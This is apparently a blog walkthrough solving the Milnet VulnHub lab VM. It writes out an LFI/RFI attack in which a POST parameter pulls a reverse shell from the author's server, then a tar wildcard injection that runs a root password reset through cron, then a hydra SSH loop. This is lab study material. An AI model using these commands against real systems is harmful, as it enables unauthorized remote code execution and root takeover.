Milnet 1 Solution

Hi Again,

Today i will show you how to PWN Milnet VM from vulnhub.

fire up the machine and run your port scans, only port 22 and 80 are open

Starting Nmap 6.40 ( http://nmap.org ) at 2016-10-29 17:08 EET
Nmap scan report for 192.168.1.12
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    lighttpd 1.4.35
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=10/29%Time=5814BB75%P=x86_64-pc-linux-gnu%r(NUL
SF:L,20,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4\r\n");
MAC Address: F4:06:69:8D:72:D7 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.40%E=4%D=10/29%OT=22%CT=1%CU=36331%PV=Y%DS=1%DC=D%G=Y%M=F40669%
OS:TM=5814BB83%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%TS=
OS:8)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11
OS:NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=712
OS:0%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B
OS:4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.1.12

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.47 seconds

 

i had a look on the webpage on port 80

Page.png

i fired up Burp and i found this

Burp1.png

there is a post parameter called route

i suspected a LFI vulnerability and i was right i used the php filter trick to get the source codes

Burp2.png

i got all the files source code but unfortunately i didn’t find any lead, also i got the phpinfo file and i found that ALLOW_URL_INCLUDE is ON.

Great we can get an RFI with this configuration, i set up a reverse shell running on my server , and did a post request with parameter route=http://192.168.1.8:8000/shell.php

and i got my self a shell.

shell.png

looking for an escalation point (fast one), my shell was on / directory , running ls i found folder called backup.

inside this backup i found a backup.sh file owned by root which contain wild card  miss configurations, of course i can’t run this file with my privilege but i searched for someone or something who calls this script.

so i looked for backup.sh inside all files in linux system

grep -r "backup.sh" > /tmp/result
below is output
$ cat /tmp/result
var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_xenial_universe_i18n_Translation-en: This package provides the backup, restore, backup.sh, and dump-remind
home/langman/SDINET/fips_500_166.txt:system data.   Each backup should be  checked to ensure  that the 
etc/crontab:*/1 *     * * *     root    /backup/backup.sh
usr/sbin/deluser:    # if --backup-to is specified, --backup should be set too
$

i can find that file is being called in to cron every 1 minute. great easy shell now.

the content of the backup file is

#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

The wildcard misconfiguration can allow us to escalate our privilege as tar has an option that can be used to inject linux commands.

i created a file called myshell.sh

file contents

echo "root:password1" | chpasswd

this changes root password.

next i created the parameters that are used to inject files in tar as an empty files in the /var/www/html directory

toutch --checkpoint-action=exec=sh myshell.sh
touch --checkpoint=1

Next i run a hydra with for loop on the machine until the password is changed

 

sakr@HacKeD ~/study/Milnet $ for i in {1..200}; do hydra -l root -p password1 192.168.1.12 ssh; done
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:50
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:52
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:52

That was a fairly easy VM, Hope you enjoyed.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s